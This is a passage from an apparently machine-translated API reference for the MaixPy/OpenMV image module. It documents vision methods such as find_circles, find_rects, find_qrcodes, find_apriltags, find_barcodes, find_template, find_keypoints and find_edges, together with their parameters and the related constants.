x_stride.\n\nY_stride is the number of y pixels that need to be skipped during the Hough transform. If the circle is known to be large, increase y_stride.\n\nThreshold Controls the circle detected from the Hough transform. Only returns a circle greater than or equal to threshold. The correct threshold value for the application depends on the image. Note: The magnitude of a circle is the sum of the size of all Sobel filter pixels that make up the circle.\n\nX_margin controls the merge of the detected circles. The round pixels are partially merged for x_margin , y_margin , and r_margin .\n\nY_margin controls the merge of the detected circles. The round pixels are partially merged for x_margin , y_margin , and r_margin .\n\nR_margin Controls the merge of the detected circles. The round pixels are partially merged for x_margin , y_margin , and r_margin .\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_rects([roi=Auto, threshold=10000])\n\nUse the same quad detection algorithm used to find AprilTAg to find rectangles in the image. Ideal for rectangles that contrast sharply with the background. AprilTag's quad detection can handle arbitrary scaling/rotating/cutting rectangles. Returns a list of image.rect objects.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle. 
The operating range is limited to pixels in the roi area.\n\nThe border size (by sliding the Sobel operator over all pixels on the edge of the rectangle and adding the value) is smaller than the rectangle of the threshold and is filtered from the return list. The correct value for threshold depends on your application/scenario.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_qrcodes([roi])\n\nFind all the QR codes in roi and return a list of image.qrcode objects. Please refer to the image.qrcode object for more information.\n\nIn order for this method to work successfully, the QR code on the image needs to be flat. By using the sensor.set_windowing function to zoom in at the center of the lens, the image.lens_corr function to dissipate the barrel distortion of the lens, or by replacing a lens with a narrow field of view, you get a flatter QR code that is unaffected by lens distortion. Some machine vision lenses do not cause barrel distortion, but they are much more expensive than the standard lenses offered by OpenMV, which is an undistorted lens.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_apriltags([roi[, families=image.TAG36H11[, fx[, fy[, cx[, cy]]]]]) Find all AprilTags in roi and return a list of image.apriltag objects. Please refer to the image.apriltag object for more information.\n\nCompared to QR codes, AprilTags can be detected in longer distances, poorer light, and more distorted image environments. AprilTags can handle all kinds of image distortion problems, and the QR code does not. That is, AprilTags can only encode the digital ID as its payload.\n\nAprilTags can also be used for localization. Each image.apriltag object returns its three-dimensional position information and rotation angle from the camera. The position information is determined by fx, fy, cx, and cy, which are the focal length and center point of the image in the X and Y directions, respectively.\n\nCreate AprilTags using the Tag Generator tool built into OpenMV IDE. The tag generator creates a printable 8.5\"x11\" AprilTags.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nThe family is the bit mask of the tag family to be decoded. Is a logical or:\n\nimage.TAG16H5 image.TAG25H7 image.TAG25H9 image.TAG36H10 image.TAG36H11 image.ARTOOLKIT The default setting is the best image.TAG36H11 tag family. Note: every time a tag family is enabled, the speed of find_apriltags will be slightly slower.\n\nFx is the focal length of the camera's x-direction in pixels. The value of the standard OpenMV Cam is (2.8 / 3.984) * 656, which is obtained by dividing the focal length value of the millimeter by the length of the photosensitive element in the X direction and multiplying by the number of pixels of the photosensitive element in the X direction (for the OV7725 photosensitive element) In terms of).\n\nFy is the focal length of the camera in the y direction in pixels. 
The value of the standard OpenMV Cam is (2.8 / 2.952) * 488, which is obtained by dividing the focal length value of the millimeter meter by the length of the photosensitive element in the Y direction, and multiplying by the number of pixels of the photosensitive element in the Y direction (for the OV7725 photosensitive element) In terms of).\n\nCx is the center of the image, image.width()/2 , not roi.w()/2 .\n\nCy is the center of the image, image.height()/2, not roi.h()/2 .\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_datamatrices([roi[, effort=200]]) Finds all the data matrices in roi and returns a list of image.datamatrix objects. Please refer to the image.datamatrix object for more information.\n\nIn order for this method to work successfully, the rectangular code on the image needs to be flat. By using the sensor.set_windowing function to zoom in on the center of the lens, the image.lens_corr function to dissipate the barrel distortion of the lens, or by replacing a lens with a narrow field of view, you get a flatter rectangular code that is unaffected by lens distortion. Some machine vision lenses do not cause barrel distortion, but they are much more expensive than the standard lenses offered by OpenMV, which is an undistorted lens.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nThe effort controls the time used to find the rectangular code match. The default value of 200 should apply to all use cases. However, you may also increase the detection at the expense of the frame rate or increase the frame rate at the expense of detection. Note: If the effort is set below about 160, you will not be able to perform any tests; instead, you can set it to any high value you want, but if the setting is higher than 240, the detection rate will not continue to increase.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_barcodes([roi])\n\nFind all the 1D barcodes in roi and return a list of image.barcode objects. Please refer to the image.barcode object for more information.\n\nFor best results, use a long 640, wide 40/80/160 window. The lower the degree of verticality, the faster the speed. Since the barcode is a linear one-dimensional image, it is only necessary to have a higher resolution in one direction and a lower resolution in the other direction. Note: This function performs horizontal and vertical scanning, so you can use a window with a width of 40/80/160 and a length of 480. Finally, be sure to adjust the lens so that the bar code is positioned where the focal length produces the sharpest image. Fuzzy barcodes cannot be decoded.\n\nThis function supports all 1D barcodes:\n\nimage.EAN2 image.EAN5 image.EAN8 image.UPCE image.ISBN10 image.UPCA image.EAN13 image.ISBN13 image.I25 image.DATABAR (RSS-14) image.DATABAR_EXP (RSS-Expanded) image.CODABAR image.CODE39 image.PDF417 image.CODE93 image.CODE128 Roi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. 
The operating range is limited to pixels in the roi area.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_displacement(template[, roi[, template_roi[, logpolar=False]]]) Find the transform offset for this image from the template. This method can be used to make light flow. This method returns an image.displacement object containing the results of the displacement calculation using phase correlation.\n\nRoi is a rectangular area (x, y, w, h) that needs to be processed. If not specified, it is equal to the image rectangle.\n\nTemplate_roi is the rectangular area (x, y, w, h) that needs to be processed. If not specified, it is equal to the image rectangle.\n\nRoi and template roi must have the same w/h, but x/y can be anywhere in the image. You can slide a smaller rois on a larger image to get a smoother image of the light flow.\n\nImage.find_displacement usually calculates the x/y translation between two images. However, if you set logpolar = True , it will find a change in rotation and scaling between the two images. The same image.displacement object results in two possible feedbacks.\n\nCompressed images and bayer images are not supported.\n\nannotation\n\nUse this method on images with a uniform length and width (for example, `sensor.B64X64`).\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_number(roi)\n\nA LENET-6 CNN (Convolutional Neural Network) trained on the MINST data set is run to detect numbers in the 28x28 ROI located anywhere on the image. Returns a tuple containing integers and floating point numbers representing the detected number (0-9) and the confidence of the detection (0-1).\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\nannotation\n\nThis method is experimental. This method may be removed if you run any CNN that Caffe trains on your PC in the future. This function has been removed by the latest 3.0.0 firmware.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.classify_object(roi)\n\nRun CIFAR-10 CNN on the ROI of the image to detect aircraft, cars, birds, cats, deer, dogs, frogs, horses, boats and trucks. This method automatically scales the image internally to 32x32 to feed to the CNN.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly RGB565 images are supported.\n\nannotation\n\nThis method is experimental. This method may be removed if you run any CNN that Caffe trains on your PC in the future.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_template(template, threshold[, roi[, step=2[, search=image.SEARCH_EX]]]) Try to find the location of the first template match in the image using the Normalized Cross Correlation (NCC) algorithm. Returns the bounding box tuple (x, y, w, h) of the matching position, otherwise returns None.\n\nTemplate is a small image object that matches this image object. Note: Both images must be grayscale.\n\nThreshold is a floating point number (0.0-1.0), where a smaller value increases the detection rate while increasing the false positive rate. 
Conversely, a higher value reduces the detection rate while also reducing the false positive rate.\n\nRoi is a rectangular region-of-interest tuple (x, y, w, h). If not specified, the ROI is the rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nStep is the number of pixels to skip while scanning for the template. Skipping pixels greatly increases the speed at which the algorithm runs. This parameter only applies to SEARCH_EX mode.\n\nSearch can be image.SEARCH_DS or image.SEARCH_EX. The image.SEARCH_DS algorithm searches for the template faster than image.SEARCH_EX, but it may fail to find the template if it lies near the edges of the image. image.SEARCH_EX performs an exhaustive search of the image, but it runs much slower than image.SEARCH_DS.\n\nOnly grayscale images are supported.\n\n#### image.find_features(cascade[, threshold[, scale[, roi]]])\n\nThis method searches the image for all regions that match the given Haar Cascade and returns a list of bounding box rectangle tuples (x, y, w, h) for these features. If no features are found, an empty list is returned.\n\nThreshold is a floating point number (0.0-1.0), where a smaller value increases the detection rate while increasing the false positive rate. Conversely, a higher value reduces the detection rate while also reducing the false positive rate.\n\nScale is a floating point number that must be greater than 1.0. A higher scale factor runs faster, but its image matching is poorer. The ideal value is between 1.35 and 1.5.\n\nRoi is a rectangular region-of-interest tuple (x, y, w, h). If not specified, the ROI is the rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\n#### image.find_eye(roi)\n\nFind the pupil in the region of interest (x, y, w, h) around an eye. Returns a tuple containing the position of the pupil (x, y) in the image. If no pupil is found, it returns (0, 0).\n\nBefore using this function, first search for a face with image.find_features() and the frontalface Haar Cascade, then use image.find_features() with the eye Haar Cascade to locate the eyes on the face. Finally, call this method on each eye ROI returned by image.find_features() to get the coordinates of the pupil.\n\nRoi is a rectangular region-of-interest tuple (x, y, w, h). If not specified, the ROI is the rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\n#### image.find_lbp(roi)\n\nLBP (local binary pattern) key points are extracted from the ROI tuple (x, y, w, h). You can use the image.match_descriptor function to compare two sets of key points and obtain the matching distance.\n\nRoi is a rectangular region-of-interest tuple (x, y, w, h). If not specified, the ROI is the rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\n#### image.find_keypoints([roi[, threshold=20[, normalized=False[, scale_factor=1.5[, max_keypoints=100[, corner_detector=image.CORNER_AGAST]]]]])\n\nORB key points are extracted from the ROI tuple (x, y, w, h). You can use the image.match_descriptor function to compare two sets of key points and obtain the matching area. If no key points are found, None is returned.\n\nRoi is a rectangular region-of-interest tuple (x, y, w, h). If not specified, the ROI is the rectangle of the entire image.
The operating range is limited to pixels in the roi area.\n\nThreshold is a number that controls the number of extractions (values ​​0-255). For the default AGAST corner detector, this value should be around 20. For the FAST corner detector, this value is approximately 60-80. The lower the threshold, the more corner points you extract.\n\nNormalized is a boolean value. If True, close the extraction keypoint at multiple resolutions. If you don't care about handling extensions and want the algorithm to run faster, set it to True.\n\nScale_factor is a floating point number that must be greater than 1.0. A higher scale factor runs faster, but its image matching is poorer. The ideal value is between 1.35 and 1.5.\n\nMax_keypoints is the maximum number of key points a keypoint object can hold. If the key point object is too large and causes memory problems, lower the value.\n\nCorner_detector is the corner detector algorithm used to extract key points from an image. Can be image.CORNER_FAST or image.CORNER_AGAST . The FAST corner detector runs faster, but with less accuracy.\n\nOnly grayscale images are supported.\n\n#### image.find_edges(edge_type[, threshold])\n\nTurn the image into black and white and leave only the edges as white pixels.\n\nimage.EDGE_SIMPLE - Simple threshold high-pass filtering algorithm image.EDGE_CANNY - Canny edge detection algorithm Threshold is a binary tuple containing a low threshold and a high threshold. You can control the edge quality by adjusting this value.\n\nThe default is (100, 200).\n\nOnly grayscale images are supported.\n\nFind_hog([roi[, size=8]]) The pixels in the ROI are replaced with HOG (Directed Gradient Histogram) lines.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n## 24. Constant\n\n### 24.1. image.SEARCH_EX\n\nDetailed template matching search.\n\n### 24.2. image.SEARCH_DS\n\nFaster template matching search.\n\n### 24.3. image.EDGE_CANNY\n\nEdge detection is performed on the image using the Canny edge detection algorithm.\n\n### 24.4. image.EDGE_SIMPLE\n\nEdge detection is performed on the image using a threshold high-pass filtering algorithm.\n\n### 24.5. image.CORNER_FAST\n\nHigh-speed low-accuracy corner detection algorithm for ORB key points\n\n### 24.6. image.CORNER_AGAST\n\nLow speed high accuracy algorithm for ORB key points.\n\n### 24.7. image.TAG16H5\n\nBitmask enumeration for the TAG1H5 tag group. Used in AprilTags.\n\n### 24.8. image.TAG25H7\n\nBitmask enumeration for the TAG25H7 tag group. Used in AprilTags.\n\n### 24.9. image.TAG25H9\n\nBitmask enumeration for the TAG25H9 tag group. Used in AprilTags.\n\n### 24.10. image.TAG36H10\n\nBitmask enumeration for the TAG36H10 tag group. Used in AprilTags.\n\n### 24.11. image.TAG36H11\n\nBitmask enumeration for the TAG36H11 tag group. Used in AprilTags.\n\n### 24.12. image.ARTOOLKIT\n\nThe bit mask enumeration of the ARTOOLKIT tag group. Used in AprilTags.\n\n### 24.13. image.EAN2\n\nEAN2 barcode type enumeration.\n\n### 24.14. image.EAN5\n\nEAN5 barcode type enumeration.\n\n### 24.15. image.EAN8\n\nEAN8 barcode type enumeration.\n\n### 24.16. image.UPCE\n\nUPCE barcode type enumeration.\n\n### 24.17. image.ISBN10\n\nISBN10 barcode type enumeration.\n\n### 24.18. image.UPCA\n\nUPCA barcode type enumeration.\n\n### 24.19. 
image.EAN13\n\nEAN13 barcode type enumeration.\n\n### 24.20. image.ISBN13\n\nISBN13 barcode type enumeration.\n\n### 24.21. image.I25\n\nI25 barcode type enumeration.\n\n### 24.22. image.DATABAR\n\nDATABAR barcode type enumeration.\n\n### 24.23. image.DATABAR_EXP\n\nDATABAR_EXP barcode type enumeration.\n\n### 24.24. image.CODABAR\n\nCODABAR barcode type enumeration.\n\n### 24.25. image.CODE39\n\nCODE39 barcode type enumeration.\n\n### 24.26. image.PDF417\n\nPDF417 barcode type enumeration (currently not working).\n\n### 24.27. image.CODE93\n\nCODE93 barcode type enumeration.\n\n### 24.28. image.CODE128\n\nCODE128 barcode type enumeration." ]
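Since none of the method descriptions above include a complete example, here is a minimal usage sketch that strings a few of the documented calls together (`lens_corr`, `find_blobs`, `get_statistics`, `get_regression`). It assumes a standard OpenMV/MaixPy board with the usual `sensor` MicroPython module; the LAB colour threshold and the tuning numbers are illustrative guesses, not recommended values.

```python
# Minimal sketch exercising a few of the image methods documented above.
# Assumes an OpenMV/MaixPy board with the standard `sensor` and `image` modules;
# the colour threshold and tuning values are illustrative only.
import sensor

sensor.reset()
sensor.set_pixformat(sensor.RGB565)   # RGB565 needed for colour blobs/statistics
sensor.set_framesize(sensor.QVGA)
sensor.skip_frames(time=2000)         # let the sensor settle

RED_THRESHOLD = (30, 100, 15, 127, 15, 127)   # (L_lo, L_hi, A_lo, A_hi, B_lo, B_hi)

while True:
    img = sensor.snapshot()
    img.lens_corr(strength=1.8, zoom=1.0)   # undo fisheye distortion; 1.8 is the suggested start

    # Colour-blob tracking: filter out tiny blobs, merge overlapping ones.
    for blob in img.find_blobs([RED_THRESHOLD], pixels_threshold=10,
                               area_threshold=10, merge=True):
        img.draw_rectangle(blob.rect())
        img.draw_cross(blob.cx(), blob.cy())

    # Whole-image colour statistics (mean, median, ... per channel).
    stats = img.get_statistics()

    # Robust linear regression over the thresholded pixels (e.g. line following).
    line = img.get_regression([RED_THRESHOLD], robust=True)
    if line:
        img.draw_line(line.line())

    print("L channel mean:", stats.l_mean())
```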
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81068635,"math_prob":0.92471546,"size":124408,"snap":"2019-43-2019-47","text_gpt3_token_len":28545,"char_repetition_ratio":0.2191489,"word_repetition_ratio":0.5746944,"special_character_ratio":0.2362549,"punctuation_ratio":0.1331959,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9607215,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T01:02:57Z\",\"WARC-Record-ID\":\"<urn:uuid:5fe2f681-25c7-4ffc-8d49-7d4baeb6bf2e>\",\"Content-Length\":\"251915\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3a41a395-e948-460f-ab65-d07e88db1806>\",\"WARC-Concurrent-To\":\"<urn:uuid:75e74503-b879-49cd-a355-e2d071ac369c>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"https://maixpy.sipeed.com/en/libs/machine_vision/image.html\",\"WARC-Payload-Digest\":\"sha1:TCS3KTOQTZFFICFDFP62QZHAV4TKSQAZ\",\"WARC-Block-Digest\":\"sha1:X5TKZWPG25PQWZ4GGWLVY63ADN4OMV36\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670643.58_warc_CC-MAIN-20191121000300-20191121024300-00274.warc.gz\"}"}
https://feet-to-meters.appspot.com/pl/2594-stopa-na-metr.html
[ "Feet To Meters\n\n# 2594 ft to m (2594 Feet to Meters)\n\n## How to convert 2594 feet to meters?\n\n2594 ft * (0.3048 m / 1 ft) = 790.6512 m\n\nA common question is: how many feet are in 2594 meters? The answer is 8510.49868766 ft in 2594 m. Likewise, the question of how many meters are in 2594 feet has the answer 790.6512 m in 2594 ft.\n\n## How much are 2594 feet in meters?\n\n2594 feet equal 790.6512 meters (2594 ft = 790.6512 m). Converting 2594 ft to m is easy. Simply use our calculator above, or apply the formula to change the length 2594 ft to m.\n\n## Convert 2594 ft to common lengths\n\n| Unit | Length |\n| --- | --- |\n| Nanometer | 7.906512e+11 nm |\n| Micrometer | 790651200.0 µm |\n| Millimeter | 790651.2 mm |\n| Centimeter | 79065.12 cm |\n| Inch | 31128.0 in |\n| Foot | 2594.0 ft |\n| Yard | 864.666666666 yd |\n| Meter | 790.6512 m |\n| Kilometer | 0.7906512 km |\n| Mile | 0.4912878788 mi |\n| Nautical mile | 0.4269174946 nmi |\n\n## What is 2594 feet in m?\n\nTo convert 2594 ft to m, multiply the length in feet by 0.3048. The 2594 ft in m formula is [m] = 2594 * 0.3048. Thus, for 2594 feet we get 790.6512 m.\n\n## 2594 Foot Conversion Table", null, "## Alternative spelling\n\n2594 ft to Meter, 2594 ft in Meter, 2594 Feet to Meter, 2594 Feet in Meter, 2594 ft to m, 2594 ft in m, 2594 Feet in m, 2594 Foot in Meter, 2594 Feet to Meters, 2594 Feet in Meters" ]
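The conversion above is a single multiplication, so it is easy to wrap in a helper. The following sketch (function names are arbitrary) reproduces the numbers quoted on this page.

```python
# Feet/meters conversion: 1 ft = 0.3048 m exactly (by definition).
def feet_to_meters(feet):
    return feet * 0.3048

def meters_to_feet(meters):
    return meters / 0.3048

print(feet_to_meters(2594))   # 790.6512
print(meters_to_feet(2594))   # ~8510.49868766 (feet in 2594 m)
```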
[ null, "https://feet-to-meters.appspot.com/image/2594.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83308744,"math_prob":0.8773278,"size":676,"snap":"2022-40-2023-06","text_gpt3_token_len":230,"char_repetition_ratio":0.22916667,"word_repetition_ratio":0.015267176,"special_character_ratio":0.4408284,"punctuation_ratio":0.15337424,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9729101,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-29T06:19:35Z\",\"WARC-Record-ID\":\"<urn:uuid:6bb4000f-9b76-439d-9306-15c767b08c0d>\",\"Content-Length\":\"28184\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ecb54164-39c9-4ac6-b497-6058a4948ca9>\",\"WARC-Concurrent-To\":\"<urn:uuid:6b5df679-2e22-42ba-85f0-2eab6c4ed407>\",\"WARC-IP-Address\":\"142.251.16.153\",\"WARC-Target-URI\":\"https://feet-to-meters.appspot.com/pl/2594-stopa-na-metr.html\",\"WARC-Payload-Digest\":\"sha1:A4BAPZSVYMIS2UP72TKBR2LPASYSNWGB\",\"WARC-Block-Digest\":\"sha1:YP2NJHAUGUS6PNX4BSNCLIKGQDEEUSQ5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335304.71_warc_CC-MAIN-20220929034214-20220929064214-00045.warc.gz\"}"}
https://www.easycalculation.com/engineering/electrical/toroid-inductance-calculator.php
[ "# Toroid Inductance Per Turn Calculator\n\nToroidal inductors are used where large inductances are required at low frequencies. They are insulated coils wound in a ring shape. Because a toroidal inductor has a large number of turns, it can carry larger currents. This online electrical calculator allows you to calculate the toroid inductance value per turn.\n\n## Toroid Inductance Per Turn Calculator\n\nuH (inductance)\ngauss/A (flux density per amp)", null, "", null, "#### Formula:", null, "L = 2*N²*μr*h*ln(d1/d2)\nAe = (h/2) * (d1-d2)\nLe = ( π * (d1-d2) ) / ln(d1/d2)\nVe = Ae * Le\nB/I = (0.4π*μr*N) / Le\n\nWhere,\nL = Inductance\nN = Number of turns\nμr = Relative permeability\nh = Core width\nd1 = Outer diameter\nd2 = Inner diameter\nAe = Effective core area\nLe = Effective core length\nVe = Effective core volume\nB/I = Flux density per amp\n\nCalculating the inductance of a toroid core coil is made easier with this electrical calculator." ]
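The formula block above translates directly into code. The sketch below evaluates the formulas exactly as listed; the function name and the sample values at the end are arbitrary, and h, d1 and d2 are assumed to be in whatever consistent length units the calculator expects.

```python
import math

def toroid_per_turn(N, mu_r, h, d1, d2):
    """Evaluate the toroid formulas listed above.

    N = number of turns, mu_r = relative permeability, h = core width,
    d1 = outer diameter, d2 = inner diameter (consistent length units).
    """
    L = 2 * N**2 * mu_r * h * math.log(d1 / d2)      # inductance
    Ae = (h / 2) * (d1 - d2)                         # effective core area
    Le = (math.pi * (d1 - d2)) / math.log(d1 / d2)   # effective core length
    Ve = Ae * Le                                     # effective core volume
    B_per_I = (0.4 * math.pi * mu_r * N) / Le        # flux density per amp
    return L, Ae, Le, Ve, B_per_I

# Illustrative values only: 20 turns, mu_r = 125, h = 0.5, d1 = 2.0, d2 = 1.0
print(toroid_per_turn(20, 125, 0.5, 2.0, 1.0))
```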
[ null, "https://www.easycalculation.com/images/embed-plus.gif", null, "https://www.easycalculation.com/images/embed-minus.gif", null, "https://www.easycalculation.com/engineering/electrical/ToroidInductance.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90733105,"math_prob":0.9979396,"size":692,"snap":"2023-40-2023-50","text_gpt3_token_len":143,"char_repetition_ratio":0.1497093,"word_repetition_ratio":0.8269231,"special_character_ratio":0.16763006,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99920636,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-05T03:11:22Z\",\"WARC-Record-ID\":\"<urn:uuid:0940babc-4fd9-4111-a752-ce668f04bd73>\",\"Content-Length\":\"27413\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:112af012-c539-4910-83dc-a88fda2a2e2e>\",\"WARC-Concurrent-To\":\"<urn:uuid:47cb66ec-0318-47f4-a53c-c30d88407a55>\",\"WARC-IP-Address\":\"173.255.199.118\",\"WARC-Target-URI\":\"https://www.easycalculation.com/engineering/electrical/toroid-inductance-calculator.php\",\"WARC-Payload-Digest\":\"sha1:UBW2GFMRLVVFERJA7VUX6WZKSLSIGMEP\",\"WARC-Block-Digest\":\"sha1:BNF6GW2DPKUHHT4VOGKZJQ2TDNURF6JU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100540.62_warc_CC-MAIN-20231205010358-20231205040358-00344.warc.gz\"}"}
https://fr.mathworks.com/matlabcentral/cody/problems/2063-a-matrix-of-extroverts
[ "Cody\n\n# Problem 2063. A matrix of extroverts\n\nNow that the introverts have had their script, the extroverts spoke up (naturally!) and demanded one as well. You will be given a matrix. Write a MATLAB script to output a new matrix consisting of the average of all four terms that are next to each other.\n\n``` 8 1 6\n3 5 7\n4 9 2```\n\n```4.2500 4.7500\n5.2500 5.7500\n```\n\nThe top left term (4.25) is the average of [8 1 ; 3 5]. The bottom left term is the average of [3 5 ; 4 9], and so on. You can assume that the size of each of these matrices will be at least 2x2. Good luck!\n\n### Solution Stats\n\n78.32% Correct | 21.68% Incorrect\nLast Solution submitted on May 07, 2020" ]
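The averaging rule is easy to check against the example above. This sketch is in Python rather than MATLAB, purely to illustrate the computation; a MATLAB solution would typically use conv2 or indexing instead.

```python
def extrovert_average(A):
    """Return the matrix of averages of every 2x2 block of adjacent entries."""
    rows, cols = len(A), len(A[0])
    return [[(A[i][j] + A[i][j + 1] + A[i + 1][j] + A[i + 1][j + 1]) / 4.0
             for j in range(cols - 1)]
            for i in range(rows - 1)]

print(extrovert_average([[8, 1, 6],
                         [3, 5, 7],
                         [4, 9, 2]]))
# -> [[4.25, 4.75], [5.25, 5.75]]
```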
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90076554,"math_prob":0.92950934,"size":684,"snap":"2020-24-2020-29","text_gpt3_token_len":218,"char_repetition_ratio":0.12352941,"word_repetition_ratio":0.0,"special_character_ratio":0.34795323,"punctuation_ratio":0.119760476,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9559409,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-25T02:14:25Z\",\"WARC-Record-ID\":\"<urn:uuid:f12c14ca-c2cb-4aa8-9de7-ab5fb810c2fa>\",\"Content-Length\":\"98728\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:93fc6d76-d8dc-462e-9c29-1bfd32421ec2>\",\"WARC-Concurrent-To\":\"<urn:uuid:b890e15e-8159-4689-8bf4-edd2b1a6c93e>\",\"WARC-IP-Address\":\"23.50.228.199\",\"WARC-Target-URI\":\"https://fr.mathworks.com/matlabcentral/cody/problems/2063-a-matrix-of-extroverts\",\"WARC-Payload-Digest\":\"sha1:2OPWYLIKKDFCWYL5F6MPFGZ6DQYM4DNE\",\"WARC-Block-Digest\":\"sha1:XARFIQP7LLAYZJDDOI3SORGQQGDKURAA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347387155.10_warc_CC-MAIN-20200525001747-20200525031747-00492.warc.gz\"}"}
https://math.stackexchange.com/questions/842801/topology-opens-vs-neighborhoods?noredirect=1
[ "# Topology: Opens vs Neighborhoods\n\nDisclaimer: This thread is meant informative and therefore written in Q&A style. The problems are highlighted in bold face.\n\nThe axiomatization of topology can be done in various ways all of them having their own advantage. Here I would like to investigate two of them specifically.\n\nThere's the one by open sets usually given: $$\\bullet \\#I<\\infty:\\quad A_i\\in\\mathcal{T}\\implies \\bigcap_{i\\in I}A\\in\\mathcal{T}\\\\ \\bullet \\#I\\leq\\infty:\\quad A_i\\in\\mathcal{T}\\implies\\bigcup_{i\\in I}A_i\\in\\mathcal{T}$$ and the one by neighborhoods introduced by Felix Hausdorff: $$\\bullet A\\subseteq B:\\quad A\\in\\mathcal{N}(x)\\implies B\\in\\mathcal{N}(x)\\\\ \\bullet A,B\\in\\mathcal{N}(x)\\implies A\\cap B\\in\\mathcal{N}(x)\\\\ \\bullet \\forall x\\in X:\\quad\\mathcal{N}(x)\\neq\\{\\}\\\\ \\bullet A\\in\\mathcal{N}(x)\\implies x\\in A\\\\ \\bullet A\\in\\mathcal{N}(x)\\implies\\exists C_0\\in\\mathcal{N}:\\quad A\\in\\mathcal{N}(c)\\text{ for all }c\\in C_0(x)$$ Prove that any family of open sets give rise to a neighborhood system via: $$A\\in\\mathcal{N_T}(x):\\iff\\exists U_0\\in\\mathcal{T}:\\quad x\\in U_0\\subseteq A\\quad$$ and that any neighborhood system gives rise to a family of open sets via: $$A\\in\\mathcal{T_N}:\\iff\\forall a\\in A:\\quad A\\in\\mathcal{N}(a)$$ Moreover prove that their equivalent in the sense: $$\\mathcal{T}\\mapsto\\mathcal{N_T}\\mapsto\\mathcal{T}\\text{ and }\\mathcal{N}\\mapsto\\mathcal{T_N}\\mapsto\\mathcal{N}$$ (Note that both must be checked in order to ensure injectivity and surjectivity.)\n\nSo we can switch back and forth between both descriptions for topology. Here are two situations where this is exploited:\n\na. The interior is defined via neighborhoods: $$A^\\circ:=\\{z:A\\in\\mathcal{N}(z)\\}$$ It is contained and open (see Topology: Interior): $$A^\\circ\\subseteq A\\text{ and }A^\\circ\\in\\mathcal{N}(z)\\text{ for all }z\\in A^\\circ$$ Therefore neighborhoods have nonempty interior: $$A^\\circ=\\bigcup_{A\\supseteq U\\in\\mathcal{T}}U$$ b. Continuity is defined via neighborhoods: $$N\\in\\mathcal{N}(f(x))\\implies f^{-1}N\\in\\mathcal{N}(x)$$ Thus in locally convex spaces topology is entailed fully in any point: $$N\\in\\mathcal{N}(x)\\iff 